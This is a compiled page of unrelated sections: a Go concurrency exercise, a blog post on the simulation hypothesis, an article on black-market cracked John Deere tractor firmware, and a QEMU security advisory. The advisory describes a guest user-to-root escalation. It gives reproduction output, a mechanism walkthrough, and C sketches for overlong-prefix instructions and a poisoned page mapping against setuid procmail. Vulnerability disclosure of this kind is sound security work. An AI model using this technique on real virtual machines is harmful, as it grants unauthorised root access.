Fork the final code on github.

Can you add another weatherProvider? (Hint: forecast.io is a good one.)

Can you implement a timeout in the multiWeatherProvider? (Hint: look at time.After.)
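
One possible sketch for the timeout exercise (my attempt, not the post's answer): give the collection loop in multiWeatherProvider.temperature a deadline with time.After, which also means importing errors (time is already used by the handler).

    // Collect a temperature or an error from each provider, but give up
    // if the providers collectively take longer than two seconds.
    timeout := time.After(2 * time.Second)

    for i := 0; i < len(w); i++ {
        select {
        case temp := <-temps:
            sum += temp
        case err := <-errs:
            return 0, err
        case <-timeout:
            return 0, errors.New("timed out waiting for weather providers")
        }
    }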

Close this section

Your yearly dose of is-the-universe-a-simulation

Yesterday Ryan Mandelbaum, at Gizmodo, posted a decidedly tongue-in-cheek piece about whether or not the universe is a computer simulation.  (The piece was filed under the category “LOL.”)

The immediate impetus for Mandelbaum’s piece was a blog post by Sabine Hossenfelder, a physicist who will likely be familiar to regulars here in the nerdosphere.  In her post, Sabine vents about the simulation speculations of philosophers like Nick Bostrom.  She writes:

Proclaiming that “the programmer did it” doesn’t only not explain anything – it teleports us back to the age of mythology. The simulation hypothesis annoys me because it intrudes on the terrain of physicists. It’s a bold claim about the laws of nature that however doesn’t pay any attention to what we know about the laws of nature.

After hammering home that point, Sabine goes further, and says that the simulation hypothesis is almost ruled out, by (for example) the fact that our universe is Lorentz-invariant, and a simulation of our world by a discrete lattice of bits won’t reproduce Lorentz-invariance or other continuous symmetries.

In writing his post, Ryan Mandelbaum interviewed two people: Sabine and me.

I basically told Ryan that I agree with Sabine insofar as she argues that the simulation hypothesis is lazy—that it doesn’t pay its rent by doing real explanatory work, doesn’t even engage much with any of the deep things we’ve learned about the physical world—and disagree insofar as she argues that the simulation hypothesis faces some special difficulty because of Lorentz-invariance or other continuous phenomena in known physics.  In short: blame it for being unfalsifiable rather than for being falsified!

Indeed, to whatever extent we believe the Bekenstein bound—and even more pointedly, to whatever extent we think the AdS/CFT correspondence says something about reality—we believe that in quantum gravity, any bounded physical system (with a short-wavelength cutoff, yada yada) lives in a Hilbert space of a finite number of qubits, perhaps ~10^69 qubits per square meter of surface area.  And as a corollary, if the cosmological constant is indeed constant (so that galaxies more than ~20 billion light years away are receding from us faster than light), then our entire observable universe can be described as a system of ~10^122 qubits.  The qubits would in some sense be the fundamental reality, from which Lorentz-invariant spacetime and all the rest would need to be recovered as low-energy effective descriptions.  (I hasten to add: there’s of course nothing special about qubits here, any more than there is about bits in classical computation, compared to some other unit of information—nothing that says the Hilbert space dimension has to be a power of 2 or anything silly like that.)  Anyway, this would mean that our observable universe could be simulated by a quantum computer—or even for that matter by a classical computer, to high precision, using a mere ~2^(10^122) time steps.
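
As a rough back-of-the-envelope check on that count (my own numbers, not Aaronson's; I'm assuming a cosmological horizon radius of very roughly 16 billion light years, about 1.6×10^26 m):

10^69 qubits/m^2 × 4π × (1.6×10^26 m)^2 ≈ 3×10^122 qubits,

which lands in the same ballpark as the ~10^122 figure above.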

Sabine might respond that AdS/CFT and other quantum gravity ideas are mere theoretical speculations, not solid and established like special relativity.  But crucially, if you believe that the observable universe couldn’t be simulated by a computer even in principle—that it has no mapping to any system of bits or qubits—then at some point the speculative shoe shifts to the other foot.  The question becomes: do you reject the Church-Turing Thesis?  Or, what amounts to the same thing: do you believe, like Roger Penrose, that it’s possible to build devices in nature that solve the halting problem or other uncomputable problems?  If so, how?  But if not, then how exactly does the universe avoid being computational, in the broad sense of the term?

I’d write more, but by coincidence, right now I’m at an It from Qubit meeting at Stanford, where everyone is talking about how to map quantum theories of gravity to quantum circuits acting on finite sets of qubits, and the questions in quantum circuit complexity that are thereby raised.  It’s tremendously exciting—the mixture of attendees is among the most stimulating I’ve ever encountered, from Lenny Susskind and Don Page and Daniel Harlow to Umesh Vazirani and Dorit Aharonov and Mario Szegedy to Google’s Sergey Brin.  But it should surprise no one that, amid all the discussion of computation and fundamental physics, the question of whether the universe “really” “is” a simulation has barely come up.  Why would it, when there are so many more fruitful things to ask?  All I can say with confidence is that, if our world is a simulation, then whoever is simulating it (God, or a bored teenager in the metaverse) seems to have a clear preference for the 2-norm over the 1-norm, and for the complex numbers over the reals.

Close this section

The Cracking Monolith: Forces That Call for Microservices

Close this section

The thriving black market of John Deere tractor hacking

To avoid the draconian locks that John Deere puts on the tractors they buy, farmers throughout America's heartland have started hacking their equipment with firmware that's cracked in Eastern Europe and traded on invite-only, paid online forums.

Tractor hacking is growing increasingly popular because John Deere and other manufacturers have made it impossible to perform "unauthorized" repair on farm equipment, which farmers see as an attack on their sovereignty and quite possibly an existential threat to their livelihood if their tractor breaks at an inopportune time.

"When crunch time comes and we break down, chances are we don't have time to wait for a dealership employee to show up and fix it," Danny Kluthe, a hog farmer in Nebraska, told his state legislature earlier this month. "Most all the new equipment [requires] a download [to fix]."

The nightmare scenario, and a fear I heard expressed over and over again in talking with farmers, is that John Deere could remotely shut down a tractor and there wouldn't be anything a farmer could do about it.

"What you've got is technicians running around here with cracked Ukrainian John Deere software that they bought off the black market"

A license agreement John Deere required farmers to sign in October forbids nearly all repair and modification to farming equipment, and prevents farmers from suing for "crop loss, lost profits, loss of goodwill, loss of use of equipment … arising from the performance or non-performance of any aspect of the software." The agreement applies to anyone who turns the key or otherwise uses a John Deere tractor with embedded software. It means that only John Deere dealerships and "authorized" repair shops can work on newer tractors.

"If a farmer bought the tractor, he should be able to do whatever he wants with it," Kevin Kenney, a farmer and right-to-repair advocate in Nebraska, told me. "You want to replace a transmission and you take it to an independent mechanic—he can put in the new transmission but the tractor can't drive out of the shop. Deere charges $230, plus $130 an hour for a technician to drive out and plug a connector into their USB port to authorize the part."

"What you've got is technicians running around here with cracked Ukrainian John Deere software that they bought off the black market," he added.

Image: Cartec-Systems

Kenney and Kluthe have been pushing for right-to-repair legislation in Nebraska that would invalidate John Deere's license agreement (seven other states are considering similar bills). In the meantime, farmers have started hacking their machines because even simple repairs are made impossible by the embedded software within the tractor. John Deere is one of the staunchest opponents of this legislation.

"There's software out there a guy can get his hands on if he looks for it," one farmer and repair mechanic in Nebraska who uses cracked John Deere software told me. "I'm not a big business or anything, but let's say you've got a guy here who has a tractor and something goes wrong with it—the nearest dealership is 40 miles away, but you've got me or a diesel shop a mile away. The only way we can fix things is illegally, which is what's holding back free enterprise more than anything and hampers a farmer's ability to get stuff done, too."

I went searching for one of the forums where pirated John Deere firmware is sold. After I found it, I couldn't do much of anything without joining. I was sent an email with instructions, which required me to buy a $25 dummy diagnostic part from a third-party website. Instead of the part, I was sent a code to join the forum.

Once I was on it, I found dozens of threads from farmers desperate to fix and modify their own tractors. According to people on the forums and the farmers who use the software, much of it is cracked in Eastern European countries such as Poland and Ukraine and then sold back to farmers in the United States.

Among the programs I saw being traded:

John Deere Service Advisor: A diagnostic program used by John Deere technicians that recalibrates tractors and can diagnose broken parts. "It can program payloads into different controllers. It can calibrate injectors, turbo, engine hours and all kinds of fun stuff," someone familiar with the software told me.
John Deere Payload files: These are files that specifically program certain parts of the vehicle. There are files that can customize and fine-tune the performance of the chassis, engine, and cab, for instance.
John Deere Electronic Data Link drivers: This is software that allows a computer to talk to the tractor. "The EDL is the required interface which allows the Service Advisor laptop to actually communicate with the tractor controllers," the source told me.

A reverse engineer who goes by Decryptor Tuning, who I met on a forum, told me they distribute programs that are "usually OEM software that is freely available but must be licensed."

Image: AlienTechUK

"If things could get better, [companies like John Deere] should be forced to freely distribute the same software dealers have," they said. "And stop locking down [Engine Control Module] reading functionality. They do this to force you to use their services, which they have a 100 percent monopoly on."

Also for sale (or free download) on the forums are license key generators, speed-limit modifiers, and reverse-engineered cables that allow you to connect a tractor to a computer. These programs are also for sale on several sketchy-looking websites that are hosted in Europe, and on YouTube there are demos of the software in operation.

On its face, pirating such software would seem to be illegal. But in 2015, the Librarian of Congress approved an exemption to the Digital Millennium Copyright Act for land vehicles, which includes tractors. The exemption allows modification of "computer programs that are contained in and control the functioning of a motorized land vehicle such as a personal automobile, commercial motor vehicle or mechanized agricultural vehicle … when circumvention is a necessary step undertaken by the authorized owner of the vehicle to allow the diagnosis, repair, or lawful modification of a vehicle function."

This means modification of embedded software is legal as long as the vehicle can still meet emissions requirements. Whether the exemption allows for the downloading of cracked software is an unanswered question.

"Are we supposed to throw the tractor in the garbage, or what?"

It's no surprise, then, that John Deere started requiring farmers to sign licensing agreements around the time the exemption went into effect. Violation of the agreement would be considered a breach of contract rather than a federal copyright violation, meaning John Deere would have to sue its own customers if it wants the contract to be enforced. I asked John Deere specifically about the fact that a software black market has cropped up for its tractors, but the company instead said that there are no repair problems for John Deere customers.

"When a customer buys John Deere equipment, he or she owns the equipment," the company said. "As the owner, he or she has the ability to maintain and repair the equipment. The customer also has the ability through operator and service manuals and other resources to enable operational, maintenance, service and diagnostics activities to repair and maintain equipment."

"Software modifications increase the risk that equipment will not function as designed," the company continued. "As a result, allowing unqualified individuals to modify equipment software can endanger machine performance, in addition to Deere customers, dealers and others, resulting in equipment that no longer complies with industry and safety/environmental regulations."

Gay Gordon-Byrne, executive director of Repair.org, a trade organization fighting for right-to-repair legislation, told me that John Deere's statement is "total crap," and noted that "some of our members have repeatedly attempted to buy the diagnostics that are referenced [from John Deere] and been rebuffed."

"They require buyers to accept an End User License Agreement that disallows all of the activities they say are allowed in their statement," she said. "Deere is a monopolist and has systematically taken over the role of equipment owner, despite having been paid fairly and fully for equipment. Their claims to control equipment post-purchase are inconsistent with all aspects of ownership including accounting, taxation, and transfer of products into the secondary market."

It's quite simple, really. John Deere sold farmers their tractors, but has used software to maintain control of every aspect of its use after the sale. Kluthe, for example, uses pig manure to power his tractor, which requires engine modifications that would likely violate John Deere's terms of service on newer machines.

"I take the hog waste and run it through an anaerobic digester and I've learned to compress the methane," he said. "I run an 80 percent methane in my Chevy Diesel Pickup and I run 90 percent methane in my tractor. And they both purr. I take a lot of pride in working on my equipment."

Farmers worry what will happen if John Deere is bought by another company, or what will happen if the company decides to stop servicing its tractors. And so they have taken matters into their own hands by taking control of the software themselves.

"What happens in 20 years when there's a new tractor out and John Deere doesn't want to fix these anymore?" the farmer using Ukrainian software told me. "Are we supposed to throw the tractor in the garbage, or what?"

If you work for a John Deere dealership or are a farmer who has been hurt by the company's stance on repair, tell me your story—here's how you can contact me securely.

Close this section

QEMU: user-to-root privesc inside VM via bad translation caching

This is a security issue in QEMU's system emulation for X86. The issue
permits an attacker who can execute code in guest ring 3 with normal
user privileges to inject code into other processes that are running
in guest ring 3, in particular root-owned processes.


== reproduction steps ==

 - Create an x86-64 VM and install Debian Jessie in it. The following
   steps should all be executed inside the VM.
 - Verify that procmail is installed and the correct version:
       root@qemuvm:~# apt-cache show procmail | egrep 'Version|SHA'
       Version: 3.22-24
       SHA1: 54ed2d51db0e76f027f06068ab5371048c13434c
       SHA256: 4488cf6975af9134a9b5238d5d70e8be277f70caa45a840dfbefd2dc444bfe7f
 - Install build-essential and nasm ("apt install build-essential nasm").
 - Unpack the exploit, compile it and run it:
       user@qemuvm:~$ tar xvf procmail_cache_attack.tar
       procmail_cache_attack/
       procmail_cache_attack/shellcode.asm
       procmail_cache_attack/xp.c
       procmail_cache_attack/compile.sh
       procmail_cache_attack/attack.c
       user@qemuvm:~$ cd procmail_cache_attack
       user@qemuvm:~/procmail_cache_attack$ ./compile.sh 
       user@qemuvm:~/procmail_cache_attack$ ./attack 
       memory mappings set up
       child is dead, codegen should be complete
       executing code as root! :)
       root@qemuvm:~/procmail_cache_attack# id
       uid=0(root) gid=0(root) groups=0(root),[...]

Note: While the exploit depends on the precise version of procmail,
the actual vulnerability is in QEMU, not in procmail. procmail merely
serves as a seldom-executed setuid root binary into which code can
be injected.


== detailed issue description ==
QEMU caches translated basic blocks. To look up a translated basic
block, the function tb_find() is used, which uses tb_htable_lookup()
in its slowpath, which in turn compares translated basic blocks
(TranslationBlock) to the lookup information (struct tb_desc) using
tb_cmp().

tb_cmp() attempts to ensure (among other things) that both the virtual
start address of the basic block and the physical addresses that the
basic block covers match. When checking the physical addresses, it
assumes that a basic block can span at most two pages.
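
For reference, the check behaves roughly as in the following self-contained
sketch (a simplified paraphrase of tb_cmp(); the struct layouts and names
here are assumptions chosen for illustration, not QEMU's exact definitions):

    /* Simplified sketch of the lookup comparison; struct layouts and names
     * are illustrative assumptions, not QEMU's exact definitions. */
    #include <stdbool.h>
    #include <stdint.h>

    typedef uint64_t tb_page_addr_t;
    #define PAGE_UNSET ((tb_page_addr_t)-1)

    struct cached_tb {                   /* stands in for TranslationBlock */
        uint64_t pc, cs_base, flags;
        tb_page_addr_t page_addr[2];     /* only two physical pages stored */
    };

    struct lookup_desc {                 /* stands in for struct tb_desc   */
        uint64_t pc, cs_base, flags;
        tb_page_addr_t phys_page1;       /* page of the block's first byte */
        tb_page_addr_t phys_page2;       /* page following the first one   */
    };

    static bool tb_cmp_sketch(const struct cached_tb *tb,
                              const struct lookup_desc *d)
    {
        if (tb->pc != d->pc || tb->cs_base != d->cs_base ||
            tb->flags != d->flags || tb->page_addr[0] != d->phys_page1)
            return false;
        if (tb->page_addr[1] == PAGE_UNSET)
            return true;                 /* block fits in a single page    */
        /* A second page is compared, but a third page is never recorded,
         * so a block that actually spans three pages can alias another
         * mapping that agrees on only the two recorded pages. */
        return tb->page_addr[1] == d->phys_page2;
    }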

gen_intermediate_code() attempts to enforce this by stopping the
translation of a basic block if nearly one page of instructions has
been translated already:

    /* if too long translation, stop generation too */
    if (tcg_op_buf_full() ||
        (pc_ptr - pc_start) >= (TARGET_PAGE_SIZE - 32) ||
        num_insns >= max_insns) {
        gen_jmp_im(pc_ptr - dc->cs_base);
        gen_eob(dc);
        break;
    }

However, while real X86 processors have a maximum instruction length
of 15 bytes, QEMU's instruction decoder for X86 does not place any
limit on the instruction length or the number of instruction prefixes.
Therefore, it is possible to create an arbitrarily long instruction
by e.g. prepending an arbitrary number of LOCK prefixes to a normal
instruction. This permits creating a basic block that spans three
pages by simply appending an approximately page-sized instruction to
the end of a normal basic block that starts close to the end of a
page.
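
To illustrate just the decoder behavior (a hypothetical standalone demo, not
the shellcode.asm from the exploit tarball), one can hand-assemble an
instruction padded with thousands of LOCK prefixes and execute it; real
hardware raises #UD once an instruction exceeds 15 bytes, while an unpatched
QEMU guest should decode and run it:

    /* Hypothetical demo, not the exploit: emit an instruction made
     * arbitrarily long with LOCK (0xF0) prefixes and execute it.
     * Real x86 hardware faults (#UD) past 15 bytes; QEMU's decoder
     * (before a fix) accepts it. */
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>

    int main(void)
    {
        uint8_t *code = mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (code == MAP_FAILED)
            return 1;

        size_t n = 0;
        /* mov rax, rdi -- rdi holds the pointer passed by the caller */
        code[n++] = 0x48; code[n++] = 0x89; code[n++] = 0xF8;
        /* ~3000 LOCK prefixes, far beyond the architectural 15-byte limit */
        memset(code + n, 0xF0, 3000);
        n += 3000;
        /* lock inc dword ptr [rax] -- the instruction the prefixes attach to */
        code[n++] = 0xFF; code[n++] = 0x00;
        /* ret */
        code[n++] = 0xC3;

        int counter = 0;
        void (*fn)(int *) = (void (*)(int *))code;
        fn(&counter);   /* #UD on bare metal; increments under unpatched QEMU */
        printf("counter = %d\n", counter);
        return 0;
    }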

Such an overlong basic block causes the basic block caching to fail as
follows: If code is generated and cached for a basic block that spans
the physical pages (A,E,B), this basic block will be returned by
lookups in a process in which the physical pages (A,B,C) are mapped
in the same virtual address range (assuming that all other lookup
parameters match).

This behavior can be abused by an attacker e.g. as follows: If a
non-relocatable world-readable setuid executable legitimately contains
the pages (A,B,C), an attacker can map (A,E,B) into his own process,
at the normal load address of A, where E is an attacker-controlled
page. If a legitimate basic block spans the pages A and B, an attacker
can write arbitrary non-branch instructions at the start of E, then append
an overlong instruction that extends beyond the start of C, yielding a
modified basic block that
spans all three pages. If the attacker then executes the modified
basic block in his process, the modified basic block is cached.
Next, the attacker can execute the setuid binary, which will reuse the
cached modified basic block, executing attacker-controlled
instructions in the context of the privileged process.
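
As orientation for the mapping step only, a minimal sketch might look like
the following; the path, load address and page indices are placeholder
assumptions, and the real attack.c additionally has to place a working
payload, force translation of the modified block, and then execute the
setuid binary:

    /* Hypothetical sketch of building the (A,E,B) view.  The path, load
     * address and page indices are assumptions for illustration; they are
     * not taken from the exploit tarball. */
    #include <fcntl.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/mman.h>

    #define PAGE      4096UL
    #define LOAD_ADDR 0x400000UL   /* assumed non-PIE base of the victim;
                                      the sketch itself would need to be
                                      built as PIE so this range is free */

    static void *map_or_die(void *addr, size_t len, int prot, int flags,
                            int fd, off_t off)
    {
        void *p = mmap(addr, len, prot, flags, fd, off);
        if (p == MAP_FAILED)
            exit(1);
        return p;
    }

    int main(void)
    {
        int fd = open("/usr/bin/procmail", O_RDONLY);  /* world-readable */
        if (fd < 0)
            return 1;

        /* A: first victim page at its legitimate address, backed by the
         * same guest-physical frame the setuid process will use. */
        map_or_die((void *)LOAD_ADDR, PAGE, PROT_READ | PROT_EXEC,
                   MAP_PRIVATE | MAP_FIXED, fd, 0);

        /* E: attacker-controlled page where B would normally sit; holds
         * the payload followed by the overlong instruction that continues
         * into the next page. */
        uint8_t *e = map_or_die((void *)(LOAD_ADDR + PAGE), PAGE,
                                PROT_READ | PROT_WRITE | PROT_EXEC,
                                MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS,
                                -1, 0);
        memset(e, 0xF0, PAGE);  /* placeholder: real payload goes first */

        /* B: second victim page, shifted one page up, so the cached
         * block's recorded second physical page matches the victim's B. */
        map_or_die((void *)(LOAD_ADDR + 2 * PAGE), PAGE,
                   PROT_READ | PROT_EXEC, MAP_PRIVATE | MAP_FIXED, fd, PAGE);

        /* ...then jump to the legitimate block that starts near the end
         * of A so QEMU caches the poisoned translation, and run procmail. */
        return 0;
    }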

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 

Close this section